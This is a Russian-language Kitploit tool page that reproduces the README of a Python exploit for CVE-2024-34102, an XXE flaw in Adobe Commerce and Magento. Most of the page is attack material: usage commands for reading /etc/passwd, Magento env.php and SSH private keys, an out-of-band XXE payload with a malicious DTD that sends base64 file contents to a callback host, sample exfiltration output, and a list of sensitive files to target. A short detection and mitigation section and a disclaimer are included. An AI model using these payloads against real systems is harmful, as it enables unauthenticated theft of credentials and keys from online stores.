Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-34102 — Эксплойт CVE-2024-34102 для python3 | Kitploit
Инструменты/GitHubGitHub/nmmorette/cve-2024-34102
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnmmorette/cve-2024-34102

CVE-2024-34102

Эксплойт CVE-2024-34102 для python3

Репозиторий
116 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-34102 — CosmicSting XXE Exploit

Python Version CVE

Эксплойт для CVE-2024-34102 (CosmicSting) — уязвимость внедрения внешних XML-сущностей (XXE) в Adobe Commerce и Magento.

📋 Об уязвимости

CVE-2024-34102 — это критическая уязвимость XXE (внешние XML-сущности), затрагивающая:

  • Adobe Commerce версий 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 и более ранних
  • Magento Open Source (те же версии)

Эта уязвимость позволяет неаутентифицированному атакующему:

  • 📄 Читать произвольные файлы с сервера
  • 🔐 Похищать учётные данные и чувствительные конфигурации
  • 💾 Получать доступ к информации в базе данных
  • 🚨 Выполнять произвольный код (в некоторых сценариях)

Оценка CVSS: 9.8 (критическая)

🎯 Авторы

Этот эксплойт основан на оригинальной работе:

  • @Chocapikk — оригинальный CVE-2024-34102

Улучшения в этой версии:

  • ✅ Собственный динамический DTD-сервер (без зависимости от fars.ee)
  • ✅ Callback-сервер с автоматическим декодированием
  • ✅ Проверка обязательных параметров
  • ✅ Логика повторных попыток для внешних сервисов
  • ✅ Более информативные сообщения об ошибках
  • ✅ Поддержка HTTPS для callback-запросов
  • ✅ Полная совместимость с Python 3.8+

🛠️ Требования

  • Python 3.8 или выше
  • Доступ к серверу для размещения DTD-файлов (VPS, Burp Collaborator и т.п.)
  • Callback-сервис (Burp Collaborator, Oastify или собственный сервер)

📦 Установка

root@kitploit:~
# Clone the repository
git clone https://github.com/YOUR_USERNAME/CVE-2024-34102.git
cd CVE-2024-34102

# Install dependencies
pip install -r requirements.txt

🚀 Использование

Метод 1: использование fars.ee (автоматический режим)

root@kitploit:~
python3 exploit.py \
  -u https://target.com \
  -f /etc/passwd \
  -c your-callback.oastify.com

Метод 2: использование собственного DTD-сервера

Терминал 1 — DTD-сервер:

root@kitploit:~
sudo python3 server_dtd.py

Терминал 2 — Эксплойт:

root@kitploit:~
python3 exploit.py \
  -u https://target.com \
  -f /etc/passwd \
  -c your-callback.oastify.com \
  --dtd-server YOUR-IP:8000

Метод 3: с собственным callback-сервером

Терминал 1 — DTD-сервер:

root@kitploit:~
sudo python3 server_dtd.py

Терминал 2 — Callback-сервер (автоматическое декодирование):

root@kitploit:~
sudo python3 callback_server.py

Терминал 3 — Эксплойт:

root@kitploit:~
python3 exploit.py \
  -u https://target.com \
  -f /etc/passwd \
  -c YOUR-CALLBACK-IP \
  --dtd-server YOUR-DTD-IP:8000

📝 Параметры

Обязательные:

  • -u, --url — целевой URL (основной домен)
  • -f, --file — файл для чтения с сервера (например, /etc/passwd)
  • -c, --callback — callback-сервер (IP/домен)

Необязательные:

  • --dtd-server — собственный сервер для размещения DTD-файла
  • --https — использовать HTTPS для callback (по умолчанию: HTTP)

🎬 Примеры

Чтение /etc/passwd

root@kitploit:~
python3 exploit.py \
  -u https://vulnerable-site.com \
  -f /etc/passwd \
  -c abc123.oastify.com \
  --dtd-server 192.168.1.100:8000

Чтение конфигурации Magento

root@kitploit:~
python3 exploit.py \
  -u https://vulnerable-site.com \
  -f /var/www/html/app/etc/env.php \
  -c abc123.oastify.com \
  --dtd-server 192.168.1.100:8000

Чтение SSH-ключей

root@kitploit:~
python3 exploit.py \
  -u https://vulnerable-site.com \
  -f /home/ubuntu/.ssh/id_rsa \
  -c abc123.burpcollaborator.net \
  --dtd-server 192.168.1.100:8000 \
  --https

🔍 Как это работает

1. Out-of-Band XXE

Эксплойт использует технику Out-of-Band XXE для вывода данных:

root@kitploit:~
<!-- Payload sent to target -->
<!DOCTYPE r [
  <!ENTITY % sp SYSTEM "http://your-server/exploit.dtd">
  %sp;
  %param1;
]>
<r>&exfil;</r>

2. Внешний DTD

Целевой сервер загружает вредоносный DTD:

root@kitploit:~
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://callback/?exploited=%data;'>">

3. Эксфильтрация

Сервер обрабатывает XML, читает файл, кодирует его в base64 и отправляет на callback:

root@kitploit:~
GET /?exploited=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo...

4. Декодирование

root@kitploit:~
echo "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo..." | base64 -d

📊 Пример вывода

root@kitploit:~
[*] CosmicSting XXE Exploit (CVE-2024-34102)
[*] Target: https://vulnerable-site.com
[+] Callback Server: abc123.oastify.com
[+] Using custom DTD server: 192.168.1.100:8000
[+] DTD URL: http://192.168.1.100:8000/12ec6594.dtd?callback=abc123.oastify.com&file=/etc/passwd&protocol=http

DTD will be dynamically generated with:
[*]   Callback: http://abc123.oastify.com
[*]   File: /etc/passwd

DTD server is running? Ready to continue? [y/N]: y
[+] Target file: /etc/passwd
[+] Callback URL: http://abc123.oastify.com/?exploited=...
[*] Sending XXE payload to: https://vulnerable-site.com/rest/V1/guest-carts/1/estimate-shipping-methods
[*] Response status: 500
[!] Status 500 - This is normal! XXE may have triggered.
[!] Check your callback server for incoming requests.
[*] Waiting for callback (5 seconds)...

=== CHECK YOUR CALLBACK SERVER ===
[!] Monitor your callback service for incoming HTTP requests
[!] Expected request: http://abc123.oastify.com/?exploited=<base64_data>

To decode the exfiltrated data:
[*]   echo 'BASE64_STRING' | base64 -d

[!] Check your Burp Collaborator or Oastify dashboard now!

🛡️ Обнаружение и смягчение

Для защитников:

Обнаружение:

  • Отслеживайте HTTP-запросы к конечным точкам /rest/V1/guest-carts/*/estimate-shipping-methods
  • Срабатывание на XML-полезные нагрузки с внешними сущностями (<!ENTITY>)
  • Обнаружение исходящих соединений с подозрительными доменами

Смягчение:

  • Обновитесь до исправленных версий:
    • Adobe Commerce 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9
  • Отключите обработку внешних сущностей в XML-парсере
  • Внедрите WAF с anti-XXE правилами

Для пентестеров:

Интересные файлы для проверки:

root@kitploit:~
/etc/passwd
/var/www/html/app/etc/env.php
/var/www/html/app/etc/local.xml
/home/USER/.ssh/id_rsa
/var/log/apache2/access.log
/proc/self/environ

⚖️ Правовое уведомление

root@kitploit:~
This exploit is provided for educational and security research purposes only.

Using this code to test systems without explicit authorization is ILLEGAL.

You are SOLELY responsible for your actions. Use only on:
✅ Your own test environments
✅ Authorized bug bounty programs
✅ Contracted penetration tests

DO NOT use on:
❌ Systems without authorization
❌ Production environments without permission
❌ Any malicious activity

The author is not responsible for misuse of this code.

📚 Ссылки

  • Бюллетень безопасности Adobe APSB24-40
  • Подробности CVE-2024-34102
  • OWASP XXE Prevention
  • Оригинальный эксплойт от Chocapikk

⭐ Если этот проект оказался полезным, пожалуйста, поставьте ему звезду!

Скачать инструмент